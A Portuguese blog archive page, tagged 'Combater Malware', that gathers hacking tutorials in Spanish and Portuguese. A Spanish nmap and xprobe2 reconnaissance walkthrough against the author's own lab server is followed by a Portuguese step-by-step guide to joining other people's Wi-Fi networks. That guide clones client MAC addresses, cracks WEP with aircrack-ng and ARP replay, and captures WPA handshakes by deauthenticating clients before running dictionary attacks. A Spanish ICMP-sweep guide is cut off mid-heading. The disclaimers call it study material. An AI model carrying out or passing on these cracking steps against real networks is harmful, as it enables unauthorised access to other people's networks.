Mostrar mensagens com a etiqueta Combater Malware. Mostrar todas as mensagens
Mostrar mensagens com a etiqueta Combater Malware. Mostrar todas as mensagens

Analisis De Puertos,Identificacion de sistema,servicios del mismo...

##################
#Author: blood_rec
#Colaborators: Georgio
#blog: http://h4xxor.blogspot.com
#web: http://e-r00t.org
#contact: blood_rec @el-hacker.org
#Musica Durante: Metallica
##################
Leia mais!!!!

Importancia de El
################################
# Analisis De Puertos,Identificacion de sistema,servicios del mismo...
################################
================================
A-Introduccion:

A La hora de identificar u realizar una tarea de auditoria web en un servidor muchos cometen el error o caen en la actividad que al comenzar una tarea de auditoria siempre se van con la busqueda de las vulnerabilidades primero o a usar sus SSS (Shadow Security Scanner)...

A LA hora de identificar un sistema u realizar una auditoria podemos hacer las cosas bien a nivel de servidor/cliente,y como en el sexo debemos empezar primero poco a poco o no me van a decir que a la hora de estar con una chica llegan se lo meten y ya en tan solo 3 meses la chica lo mandara al carajo xD...

pues los sistemas son asi debemos ir poco a poco para interactuar con ellos ya que con solo identificar el sistemas scannear los puertos y servicios (Deamons) que gestiona el mismo podemos hacer cosas maravillosas sin nesesidad de utilizar otras tecnicas...

a veces se les puede tornar aburrido pero de esto se trata esto mientras mas areas vas cubriendo en el tema mucho mas acto eres para llegar a tus objetivos...solo me voy a basar en teorias y algunas practicas y pruebas que realizo en mi servidor local,donde poseo algunas aplicaciones vulnerables y no vulnerables pero podemos vulnerarlas atacando sus servicios u cosas xD...

El servidor en el cual esta todo instalado es un servidor Ubuntu 8.10 Kernel Generico Apache/2.2.9 Suhosin-Patch Server con algunas aplicaciones como joomla,smf,wordpress y otro scripts programados. el servidor obviamente esta en mi red local., la maquina auditora esta con Slackware Kernel 2.6.21.5 (Una Laptop) y a la que la e convertido en una suite de pentesting...xD

B-Comienzo:

Bueno comenzaremos con Nmap O Zenmap cualquiera de los 2.ya que los comandos son practicamente lo mismo pero nos orientaremos a la primera ya que usaremos la consola en lo personal lo prefiero ya que es un poco mas rapido y de verdad que no me gusta la GUI de la misma xD para los gusto los colores y para el culo los mojones....xD pero pueden usar la que gusten...

Nmap es un scanner de puertos y servicios hasta con el mismo puedes identificar sistemas operativos de manera remota una herrmienta imprecindible para cualquier auditor,experto en seguridad,Administrador De Red,Sistema,Servidor,Lammer,Hacker,noob,geek,hasta el user normal pero es imprecindible si a estas alturas no sabes lo que es te ivito que busques en internet u entre a la pagina del autor.:

http://www.insecure.org/nmap

Sigamos Para comenzar con un scanneo Basico veremos La manera de comenzar son comandos muy faciles de aprender de memoria pero empezemos poco a poco

Voy a Probar scaneando el servidor con las reglas del firewall excluyendo a la maquina auditora a ver que sucede?:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:29 GMT
All 1715 scanned ports on 192.168.56.1 are filtered
MAC Address: 00:76:62:6E:65:74 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 49.736 seconds ]

Acabamos de ver que el firewall de esa manera nos bloqueo todos los pedidos dejandonos muchos logs en el servidor auditado:

[ Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:636 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Ldaps
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:1723 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Tacacs
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:113 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Auth
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:23 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Telnet
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:53 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:DNS
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:HTTP
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Klogin ]

UFF jajaja solo son algunos de los que puede dejar ok agregamos una regla que es lo que un servidor normal pues deberia tener ya que debe dejar la entrada de las ip's pero no en todos los caso ya que las reglas aplican a algunos puertos pero excluyen a muchos pero aprenderemos como sacar el mejor provecho posible... Ahora Vamos Y Realizamos:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:28 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address:Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.743 seconds
]

Ya tenemos identificado al menos lo inicial y miremos que tenemos como pudieron ver fue un scan bien basico solo los puertos /tcp como la mayoria de los scanners en la jungla esto scans son bien agresivos y siempre son agarrados por el firewall como vimos en el primer caso terminando por banear nuestra ip si el administrador tiene buenas reglas n el firewall:
#####################
#Puerto | Servicio #
#####################
#25/tcp | smpt #
#80/tcp | http #
#110/tcp | pop3 #
#1241/tcp| nessus #
#2500/tcp| rtsserv #
#####################

Bueno analizemos tenemos 5 puertos identificados de primera instancia que se gestionan bajo el protocolo /tcp si no teneis conocimiento sobre que es el protcolo /tcp u los otros protocolos similares /udp y cosas pues no continues leyendo e instruyete desde 0 mijo...

en fin con el scaneo sencillo identificamos solo esos puertos como pudieron apreciar que el log del scan nos indica tambien que se encontraron Not shown: 1710 closed ports que estan entiendase o cerrados o filtrados Huh entonces preguntaran de como es posible si es una herramienta de scaneo de puertos y servicios pero de esto se trata de poder hacer las identificaciones especificas..

ahora queremos saber que sistema operativo tiene siempre como root asumiendo que estais en linux (igual puede hacerlo desde el otro sistema operativo) xD ok, pues realizamos

[ go0ns @squad # nmap -O 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:32 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address: (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.60%D=6/26%OT=25%CT=1%CU=33422%PV=Y%DS=1%G=Y%M=007662%TM=4A455AA
OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC
OS:D=1%ISR=CD%TI=Z%II=I%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6
OS:=M5B4)WIN(W1=16D0%W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T
OS:=40%W=16D0%O=M5B4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=N)U1(R=Y%DF=N%T=40%TOS=C0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUL
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%TOSI=S%CD=S%SI=S%DLI=S)


Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.029 seconds
]

Bueno pudieron apreciar que nmap reacciono casi de la misma manera que con el 2do intento con un scaneo de puertos sencillo en los protocolos /tcp pero en este caso usamos el argumento -O para scanear el posible sistema operativo, como funciona? nmap envia cadenas especializadas a dos puertos especificos uno cerrado y uno abierto, estolo hace con el proposito de que cada sistema operativo reacciona de manera diferente a estas peticiones y como pudieron ver el scanner tubo problemas descubriendo el server que como mencione antes era ubuntu 8.10 pero igual vean los primeros resultados que se acercan a lo que queremos:

[ OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC ]

Los comandos basicos de nmap los pueden ir encontrando poco a poco que tal si cambiamos un poco los comandos para que vallan haciendose una idea y familiarizandose con dicho programa y la manera que tenemos como siempre de llagar a nuestro objetivo en este caso usaremos un scaneo intensivo pero rapido que se supone que nos arroje los resultados mas imprecindibles..

[go0ns @squad # nmap -T Aggressive -A -v 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-27 01:43 GMT
Initiating ARP Ping Scan at 01:43
Scanning 192.168.56.1 [1 port]
Completed ARP Ping Scan at 01:43, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:43
Completed Parallel DNS resolution of 1 host. at 01:43, 13.00s elapsed
Initiating SYN Stealth Scan at 01:43
Scanning 192.168.56.1 [1715 ports]
Discovered open port 25/tcp on 192.168.56.1
Discovered open port 80/tcp on 192.168.56.1
Discovered open port 110/tcp on 192.168.56.1
Discovered open port 2500/tcp on 192.168.56.1
Discovered open port 1241/tcp on 192.168.56.1
Completed SYN Stealth Scan at 01:43, 0.55s elapsed (1715 total ports)
Initiating Service scan at 01:43
Scanning 5 services on 192.168.56.1
Completed Service scan at 01:43, 11.47s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.1
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 01:43
Completed SCRIPT ENGINE at 01:43, 5.05s elapsed
Host 192.168.56.1 appears to be up ... good.
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4
MAC Address: (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.23
Uptime: 0.089 days (since Fri Jun 26 23:35:55 2009)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: go0ns.s3rver

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.036 seconds
Raw packets sent: 1735 (77.100KB) | Rcvd: 1731 (80.266KB) ]

Uff que lectura mas larga pero vamos a ver que datos contiene que nos pueden ayudar y ya se habran dado de cuenta de la gran diferencia con los resultados y el cambio de Parametros.

Veamos primero el scan y estas opciones para ver lo que relativamente es importante antes de probar este de ahora tratamos de identificar el sistema operativo lo que realizo fue adivinar el sistema operativo pero esta vez logramos de dar con el mismo mas especificamente y dar con los servicios que gestiona el mismo como los deamons miremos:

[ PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4 ]

Como podemos ver identifica nuevamente los puertos ya mencionados asi como los servicios y la version y magicamente identifica el sistema operativo que gestiona el server :

[ Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch ]

Sonrisa y la otra parte relativamente importante es que identifica la version de los servicios aunque esto no es tan fundamental por que puede que sea un falso asi como uno correcto pero aqui es que llega la intuicion del auditor de usar la logica ya que puedes ir teoricamente buscando cual es la version real de dicho servicio con la identificacion del sistema operativo.

y que resume esto? que podemos darnos con el escenario que la aplicacion web no es vulnerable pero si los servicios o deamons del mismo y podemos vulnerarla por ahi xD ELEMENTAL NO?

por eso es que es bien importante los scaneos de identificacion por que de muchas maneras puedes encontrar las vulnerabilidades si no lo son a nivel web son a nivel server pero siempre encontraras algo.Sigamos

[ OS details: Linux 2.6.13 - 2.6.23 ]

Nos indica mas o menos el kernel que corre bajo el sistema operativo pero no siempre se da este caso del mismo las mayoria de las veces lo atina..

otra de las herramientas que podemos encontrar por la jungla de la web es xprobe2 para la identificacion de sistemas operativos veamos:

[ go0ns.squad # xprobe2 -v 192.168.56.1

* Primary guess:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.22" (Guess probability: 100%)
* Other guesses:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.23" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.21" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.20" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.19" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.24" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.25" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.26" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.27" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.28" (Guess probability: 100%)
* Cleaning up scan engine
* Modules deinitialized
* Execution completed ]


casi igual como nmap lo unico que este tiene tareas mas especificas en la identificacion de sistemas operativos y nos arroja el mismo resultado que muchas veces pued confundir pero a medida que vallan perfeccionando las tecnicas dan con los mismos.

Otra herramienta que nos puede ayudar en la identificacion de sistemas y objetivos de la informacion del mismo es Maltego que se puede descargar desde Paterva.com con la que pueden sacar emails,directorios,archivos,dominios,sub dominios y otras cosas del servidor identificado.

entonces que es lo que quiero adentrar y detallar mas aqui solo queria explicarles que para identificar vulnerabilidades en un servidor no tienes primero que comenzar por la aplicacion web nesesariamente con tan solo con la identificacion misma del sistema puedes abrir muchas posibilidades a descubrir muchas mas cosas que solo las vulnerabilidades que tiene la web o el servidor...

si ya saben que pueden encontrar una aplicacion web en un servidor que no sea vulnerable que buscas por lados y no encuentras nadas pero se te olvido buscar los servicios que tiene el server pero cuando scaneas encuentras que tiene varios deamons que son vulnerables como el mencionado arriba que gestiona el correo postfix donde corre el servicio smpt y supongamos que ese servicio contiene un deamon que sea vulnerable a un buffer overflow o (desbordamiento) como quieran decirle entonces BINGO !!! haz encontrado algo al menos en mi servidor local solo hay muy ocos servicios gestionandose.

pero siempre alla fuera en la jungla encontrarn muchicimo mas como servicios de mysql,mssql,u otras cosas interesantes..

entonces siempre recuerden que la identificacion de sistemas es lo primero que debemos hacer a la hora de buscar vulnerabilidades en una web por que puedes llegar a encontrar puertas abiertas sin tener que registrar la aplicacion web y no te imaginas las posibilidades que hay dentro del mismo..

si si te preguntas SE PUEDE USAR NMAP PARA BUSCAR VULNERABILIDADES? no y si por que no te identificara las vulnes de primera instancia pero realiza algunas cadenas de reglas como metodos de scan que te audarian a identificar servicios sin actualizacion vulnerables a algunos ataques..

espero que esta breve explicacion sobre la importancia de la identificacion y puertos de un sistema les haya gustado ya Breve Pasamos al proximo Paper y Aqui les dejo una listita de algunas herramientas que te ayudarian en este renglon:
nmap
Zenmap
Amap
Maltego
httprint
unicornscan
xprobe

son herramientas con usos similares pero les pueden acomodar tareas especificas para sacarle provecho...

Greetz: JosS,alevsk,ANTRAX,h4n0wars,e-r00t.org,security-shell members,Darvein,y mis hijos por crecer tan rapido carajo xD..



###########
#blood_rec#
###########

para leer el papel mas completo:
Link
Link

[Tutorial] Descobrir IP - MAC - WEP - WPA

Venho aqui fazer este tutorial mostrando como nossas redes de internet wifi são frágeis e facilmente são invadidas, possibilitando assim que usem nossa internet sem permissão!

Vou mostra aqui algumas técnicas de conectar em redes aberta ou protegidas, este tutorial e apenas para estudo, para que possamos proteger nossas redes contra ataques deste tipo, não me responsabilizo por mau uso destas técnicas, lembrando que furto de sinal de internet é crime com Pena de detenção, de três meses a um ano, e multa, por isso seja consciente do que você esta fazendo!





Bom vamos começar!



conectando em rede sem proteção no Windows

Redes sem proteção = estas redes são facilmente invadidas pois geralmente você só tem que saber um ip valido na rede para scanea-la e obter um ip e mac validos


Windows

Primeiro conecte na rede normalmente



Bom como não sabemos nem mac nem ip de um cliente para conectar, vamos ter que conseguir, para isso vamos usar um programa chamado wireshark!

Wireshark
http://www.easy-share.com/1904123477...etup-1.0.0.exe

Instale o wireshark, depois de instalar vamos capturar alguns pacotes para pegar os dados,

Abram o wireshark, click em show the capture options …




Vai aparecer uma janela com algumas configurações:

Faça as seguintes modificações:

1 - Em interface, escolha seu dispositivo wifi,(placa pci,usb,etc...), no meu caso atheros AR5005G

2 - Desmarque a opção: capture packets in promíscuos mode

3 - Clique em start!



Vai começar a captura, capture alguns pacotes, até que você consiga pacotes ARP (ficam destacados na cor azul claro).

Depois de capturar alguns pacotes, pare a captura, vá em filter e escreva “ARP” (em aspas).

Vai filtrar no por pacotes ARP!


Veja na figura abaixo os possíveis dados que encontramos,



Bom agora temos ip, gateway, e mac.

Precisamos ainda da mascare de rede e dns

Mascara de rede = geralmente a mascara de rede é 255.255.255.0 ou 255.0.0.0 ou 255.255.255.252

Dns = a dns você pode tentar capturar igual você fez com o ip, usando o wireshark, mas geralmente todas as redes funcionam usando os dns públicos, o dns que eu uso e 200.176.2.10

Pronto agora temos todos os dados em mãos, precisamos clonar o mac address,

Baixem o programa a-Mac Address Change

http://www.easy-share.com/1904125843... ZANZIBA00.rar

Instale-o normalmente, o registre com o serial que vem junto com ele.

Abra o programa

1 = escolha a interface a qual você quer trocar o mac, no meu caso a atheros ar5005g

2 = neste campo digitem o mac que você capturou no wireshark, (obs. sem os “:”)

3 = click em change mac to, click em yes , e yes novamente, o PC vai reiniciar


Pronto, agora e só ir às propriedades de conexão / protocolo tcp/ip / propriedades e adicionar ip, gateway, mascara de rede e dns que você já tem, click em ok e pronto!


Notas, depois que você conectar na rede e estiver navegando na internet, através do a-Mac Address Change você pode conseguir mais macs e ips, e apenas clicando em scan, aparecerão todos os ip que estiverem conectados na rede.



-------------------------------------------------------------------------------------------------

Agora vamos quebrar a wep no linux
que em minha opinião e muito mais fácil do que no Windows, alem do que tem um suporte muito maior a modo monitor, pois muitas placas só entram em modo monitor no linux.



wifislax 3.1

ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

Bom minha placa e uma atheros AR5005G
Existem varias distros de linux, não vou entrar em detalhes de como instalar os programas, pois iria levar muito tempo, se você tem dificuldade em instalar programas no linux, baixe um live CD de auditoria em redes wifi, eu vou usar o wifislax 3.1

1 - vamos abrir uma janela do Shell

Vamos a os comandos, estes comandos são digitados 1 a 1, e sem o #, que no caso seria wifislax#...

2 - vamos trocar o mac para 00:11:22:33:44:55

#ifconfig ath0 down
#ifconfig ath0 hw ether 00:11:22:33:44:55
#ifconfig ath0 up


3 - vamos colocar a placa em modo monitor

#wlanconfig ath0 destroy
#modprobe -r ath_pci
#modprobe ath_pci autocreate=monitor


4 - vamos usar o airodump para capturar os pacotes .ivs para quebrar a wep com o aircrack, e preciso de pelo menos 400 mil pacotes, (este numero pode variar, mas aqui eu precisei disso)

Legenda do comando usado abaixo

-W = entrada por nome de pacote
wep = nome do pacote de captura
--dssid = mac do ap que você quer quebra a wep
-c = canas do ap que você quer quebrar a wep
ath0 = interface da minha placa, eu só tenho placa atheros, ai não sei se varia para outros modelos e marcas

Comando

#airodump-ng --ivs -w wep --bssid 00:00:00:00:00 -c 10 ath0

Ai ira começar a captura, lembrando que aqui eu precisei de 400 mil pacotes,


5 - você tem como agilizar a captura usando uma autentificação falsa

Legenda do comando usando abaixo:

-1 = autentificação falsa
0 = tempo em segundos da reassociação
-e = entrado do nome do ap que você vai quebra wep
-a = mac do ap que você quer quebrar a wep
-h = mac de um cliente que autenticou lá no airodump


Comando:

#aireplay-ng -1 0 -e apvitima -a 00:00:00:00:00 -h 00:00:00:00:00 ath0


6 - rejeição de arp

Legenda do comando usado abaixo:

-3 = repetição padrão do pedido do arp
-b = mac do ap que você quer quebrar a wep
-h = mac de um cliente que autenticou la no airodump

Comando:

#aireplay-ng -3 -b 00:00:00:00:00 -h 00:00:00:00:00 ath0


Bom depois de alcançar os 400 pacotes feche o airodump e o aireplay

7 - agora vamos quebrar a wep com o aircrack

Abra o sheel

Legenda do comando usado abaixo:

-a = força modalidade de ataque
-1 = wep estática
-0 = aplica cores no aircrack
-n = especifica o tamanho da key, sendo de 64,128,256 bits
Wep-01.ivs = é o pacote que capturamos no airodump , cujo nome posto foi wep, e que por padrão o programa adiciona -01, então se você por exemplo colocou Maria como nome da captura no airodump vai ficar assim, Maria-01.ivs

Comando

#aircrack-ng -a 1 -0 -n 64 wep-01.ivs


Pronto você quebrou a wep no linux
-------------------------------------------------------------------------------------------



Bom agora vou mostrar aqui como quebrar a wep no Windows,
o Windows e muito ruim para quebrar wep, mas em todo causo ai vai à explicação.


Estou usando uma atheros

Lembrando que você tem que instalar o driver de modo monitor de sua placa wifi

Aqui fica o driver da minha!

http://www.easy-share.com/1904125957..._ZANZIBA00.rar

Bom vamos lá

Você não pode esta conectado em nenhuma rede, certifica se disso, pois se não sei PC pode reiniciar.

Baixe a suíte aircrack e salve com um nome fácil no c:\


aircrack download = http://www.easy-share.com/1904126085..._ZANZIBA00.rar

Aqui eu salvei com o nome de wep

Vá à pasta bin e abra o airodump-ng



Agora vamos configurar o airodunp

1 = known network adapters: aqui você ira escolher sua interface de rede (placa pci, usb, etc...) no meu caso e atheros ar5005g, que é indicada pelo numero 11.

2 = network interface index nunber: coloque o numero indicado pela interface de rede, no caso 11.

3 = interface types: e o chipset da interfase, no meu caso atheros, que é indicado pela letra a.

4 = channel(s): indica o numero do canal do ap que você quer quebrar a wep, no meu caso 11.

5 = output file name prefix: o nome que vai ficar salvo o arquivo .ivs, no meu caso coloquei wep

6 = only write wep ivs: coloque y



Ai vai começar a captura, capture cerca de 400 mil pacotes.

Depois de ter capturado alguns pacotes vamos quebrar a wep

Vá no iniciar executar e digite cmd

No prompt digite

C:\wep\bin\aircrack-ng -n64 wep.ivs

Legenda do comando acima

-n = tamanho da chave wep 64/128/256
wep.ivs = nome que você deu a captura de arquivos no airodump




Pronto aqui esta a chave de wep



---------------------------------------------------------------------------------------------------


aqui vc vai ver como quebrar wpa com linux,
este tutorial eu ainda não tive a chance de testar, por falta de rede com wpa aqui, ele não é meu, creditos a o jedai

vamos la

Este procedimento foi usado com o Live CD Wifislax
Após colocar sua placa em modo monitor faça o seguinte:


1) #airodump-ng ath0

Mostra todos os Aps disponíveis, MAC dos Aps, canal, informações que precisamos.
Ath0 = Neste caso é a interface da minha placa wireless, verifique qual é o seu com o comando:
#ifconfig

2) #airodump-ng –b XX:XX:XX:XX:XX:XX –c 11 –w nomedoarquivo ath0

-b = Captura de tráfego no MAC do Ap especificado
-c = Expecifica o canal do Ap em questão
-w = Saída do arquivo.Vai gerar um arquivo “nomedoarquivo.cap”

3) #aireplay-ng -0 30 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath0

Lançamos um ataque de negação de serviço.No passo (2) vai dar para vc identificar um ou mais clientes associados, anote o MAC de um deles, fica assim:

-0 = Ataque de negação de serviço
30 = Faz a solicitação 30 vezes.Você pode mudar o valor se quiser.
-a = Endereço MAC do AP
-c = Endereço MAC do cliente pelo qual você quer desassociar

4)#aircrack-ng nomedoarquivo.cap

Esse é um momento importante.WAP utiliza um protocolo que se chama “handshake”,
Ou seja, qdo você tenta se conectar ao Ap o handshake se encarrega de verificar se a senha está correta, e retorna a solicitação. Quando lançamos o ataque de negação de serviço, o cliente foi automaticamente obrigado a enviar nova solicitação (com a chave que precisamos ...
Deve aparecer algo como:

# BSSID.............................ESSID........... ......................Encryption

1....XX:XX:XX:XX:XX:XX......nome do Ap.............WPA (1 handshake)

Tem que aparecer “WPA (1 handshake) e não WPA (0 handshake).Vai dando negação e tentando até conseguir.

5) #genpmk -f wordlist -d hashfile-ratinho -s nome do Ap

Lançamos então “genpmk” para gerar um arquivo “hashfile” que é um arquivo que contém a tão sonhada senha WAP.

-f = Especifica a entrada da sua wordlist

6) #cowpatty -r nomedoarquivo-01.cap -d hasfile-nomedoarquivo -s nome do Ap

Uma vez gerado o hasfile, lançamos cowpatty que nos dará a preciosa senha, aparecerá algo assim:

Cowpatty 4.0 – WPA-PSK dictionary attack . jwright@hasborg.com

Collected all necessary data to mount crack against WPA/PSK passpharase
Starting dictionary athack. Please be patient.

The PSK is “00112233”

Preste atençao, se não der a senha, não desanime, não precisa repetir todo o procedimento pois você já tem o arquivo com a senha lembra (ratinho-01.cap e hasfile-ratinho ). Pegue uma outra wordlist e recomece do item (4) em diante.

Esses procedimentos foram realizados no Wifislax, nele já vem o cowpatty. Se na sua distribução não tiver o cowpatty pode instalar ou fazer o seguinte:
A partir da negação de serviço (Item 3)

#aircrack-ng -a 2 -0 -w wordlist.lst nomedoarquivo-01.cap

-a = Força modulo de ataque
2 = WPA/WPA2-PSK
-0 = Aplica cores
-w = Incremento de dicionário

Acho esse método até mais fácil, da para ver em tempo real passando as senhas da wordlist, tudo bem colorido.

creditos:zanziba00

Rastreo y Exploración de Sistemas

Aviso!
Este tutorial está em espanhol, e serve para testar se o seu sistema é seguro invadindo-o de fora. A teckboard não se responsabiliza por outras utilizações indevidas.
_______________________________________________________


En esta guía vamos a aprender técnicas y métodos de exploración de redes y sistemas. Veremos métodos para identificar estaciones de trabajo de una red, métodos de rastreo estándar como vainilla conect() y SYN medio abierto, métodos sigilosos de rastreo (indicador de TCP inverso, indicador ACK), métodos anónimos (rastreo de rebote FTP, rastreo de rebote en Proxy) y rastreo de puertos UDP. Pensaba incluir también una técnica silenciosa para enumerar servicios utilizando zombies, pero debido a la extensión y a las posibilidades que ofrece, se dejará para más adelante, ya que no daría tiempo a explicarla como se merece en este how-to.



SONDEO ICMP:


Supongamos que estamos dentro de una red. Como sabréis, en una red podemos encontra estaciones de trabajo, servidores de archivos, servidores de disco, servidores de impresión, servidores ftp, servidores web, servidores de correo... todos ellos conectados a un concentrador, conmutador o router (dependiendo de la red/subred) situado en el típico armario de conexiones. Un atacante, lo primero que haría sería hacerse con las ip's internas de la red con el fin de elaborar un mapa de conceptual de la red y los equipos que la componen. A continuación, procedería a evaluar estos sitemas con la finalidad de encontrar servicios que abordar.

Un sondeo ICMP revelaría en redes potencialmente débiles y poco protegidas, información sobre sus equipos. Existen varios tipos de mensajes ICMP, pero a nosotros nos interesan especialmente cuatro de ellos, que son los que resultan verdaderamente últimes para rastrear una red.

Echo request = También conocidos como paquetes ping. Mediante Nmap, podemos realizar barridos ping para identificar de una manera sencilla los equipos de la red.

Timestamp request = Son solicitudes de tiempo y se utilizan para obtener el tiempo que tarda nuestro equipo en obtener una respuesta del equipo victima.

Information request = Este mensaje se ideó en un principio para localizar sistemas autoconfigurables en el momento de arranque, consiguendo de esta manera descubrir direcciones de red.

Subnet address mask request = Estos mensajes revelan información sobre la mascara de subred utilizada por el equipo analizado. Esto servirá al atacante para realizar el mapa de la estructura de la red y sus subredes.

Barrido ICMP con Nmap:

Nmap, que a en mi humilde opinión, es una auténtica obra de arte de la programación (y los administradores de redes saben por qué lo digo), nos permite realizar barridos icmp con el fin de localizar maquinas internas. Un barrido ICMP consiste en enviar mensajes de tipo 8 "echo request" a todas las direcciones IP internas de la red. Esto se realizaría con el comando:

Código:
$ sudo nmap -sP 192.168.2.0/24

Starting Nmap 4.62 ( http://nmap.org ) at 2008-12-22 01:46 CET n hostname -- replacing with '*' Host (192.168.2.1) appears to be up. MAC Address: 00:XX:XX:XX:XX:XX Host 192.168.2.100 appears to be up. Host 192.168.2.103 appears to be up. Host 192.168.2.114 appears to be up. Host 192.168.2.116 appears to be up. Host 192.168.2.117 appears to be up. Host 192.168.2.124 appears to be up. Nmap done: 256 IP addresses (7 hosts up) scanned in 2.142 seconds

Con el argumento -sP, estamos indicando a Nmap que realice un barrido ping en la red. Un administrador competente, habrá filtrado el tráfico ICMP en los firewalls y en el router, por ello esta técnica quedaría obsoleta y habría que condimentarla con algo más. Podríamos añadir al comando el argumento "-PI", que enviará paquetes de sondeo TCP ACK y SYN al puerto 80 de cada equipo:

Código:
$ sudo nmap -sP -PI 192.168.2.0/24

Starting Nmap 4.62 ( http://nmap.org ) at 2008-12-22 01:46 CET n hostname -- replacing with '*' Host (192.168.2.1) appears to be up. MAC Address: 00:XX:XX:XX:XX:XX Host 192.168.2.100 appears to be up. Host 192.168.2.103 appears to be up. Host 192.168.2.107 appears to be up. Host 192.168.2.114 appears to be up. Host 192.168.2.116 appears to be up. Host 192.168.2.117 appears to be up. Host 192.168.2.124 appears to be up. Host 192.168.2.136 appears to be up. Host 192.168.2.141 appears to be up. Nmap done: 256 IP addresses (7 hosts up) scanned in 6.053 seconds

Como podéis apreciar, hemos obtenido más información con este comando que con el anterior.

SING:

